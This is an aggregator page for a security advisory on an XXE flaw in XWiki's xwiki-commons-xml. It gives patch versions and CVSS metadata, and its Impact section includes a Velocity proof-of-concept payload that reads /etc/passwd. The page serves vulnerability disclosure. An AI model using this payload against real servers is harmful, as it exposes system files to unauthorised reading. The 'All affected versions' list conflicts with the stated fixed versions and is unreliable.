Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1tMnI1LTR3OTYtcXhnNc1Biw
Arbitrary file access through XML parsing in org.xwiki.commons:xwiki-commons-xml
Impact
It's possible in a script to access any file accessing to the user running XWiki application server with XML External Entity Injection through the XML script service.
For example:
{{velocity}}
#set($xml=$services.get('xml'))
#set($xxe_payload = "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///etc/passwd' >]><root><foo>&xxe;</foo></root>")
#set($doc=$xml.parse($xxe_payload))
$xml.serialize($doc)
{{/velocity}}
Patches
The problem has been patched on versions 12.10.10, 13.4.4 and 13.8RC1.
Workarounds
There's no easy workaround for fixing this vulnerability other than upgrading and being careful when giving Script rights.
References
https://jira.xwiki.org/browse/XWIKI-18946
For more information
If you have any questions or comments about this advisory:
- Open an issue in Jira XWiki
- Email us at XWiki Security mailing-list
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tMnI1LTR3OTYtcXhnNc1Biw
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 2 years ago
Updated: about 1 year ago
CVSS Score: 4.9
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Identifiers: GHSA-m2r5-4w96-qxg5, CVE-2022-24898
References:
- https://github.com/xwiki/xwiki-commons/security/advisories/GHSA-m2r5-4w96-qxg5
- https://github.com/xwiki/xwiki-commons/commit/947e8921ebd95462d5a7928f397dd1b64f77c7d5
- https://jira.xwiki.org/browse/XWIKI-18946
- https://nvd.nist.gov/vuln/detail/CVE-2022-24898
- https://github.com/advisories/GHSA-m2r5-4w96-qxg5
Blast Radius: 9.2
Affected Packages
maven:org.xwiki.commons:xwiki-commons-xml
Dependent packages: 10Dependent repositories: 77
Downloads:
Affected Version Ranges: >= 13.5-rc-1, <= 13.7, >= 13.0.0, < 13.4.4, >= 2.7, < 12.10.10
Fixed in: 13.8-rc-1, 13.4.4, 12.10.10
All affected versions: 12.10.11, 13.4.6, 13.4.7
All unaffected versions: 13.10.2, 13.10.3, 13.10.4, 13.10.5, 13.10.6, 13.10.7, 13.10.8, 13.10.9, 13.10.10, 13.10.11, 14.2.1, 14.3.1, 14.4.1, 14.4.2, 14.4.3, 14.4.4, 14.4.5, 14.4.6, 14.4.7, 14.4.8, 14.10.1, 14.10.2, 14.10.3, 14.10.4, 14.10.5, 14.10.6, 14.10.7, 14.10.8, 14.10.9, 14.10.10, 14.10.11, 14.10.12, 14.10.13, 14.10.14, 14.10.15, 14.10.16, 14.10.17, 14.10.18, 14.10.19, 14.10.20, 14.10.21, 15.5.1, 15.5.2, 15.5.3, 15.5.4, 15.5.5, 15.10.1, 15.10.2, 15.10.3, 15.10.4, 15.10.5, 15.10.6, 15.10.7, 15.10.8, 16.0.0, 16.1.0, 16.2.0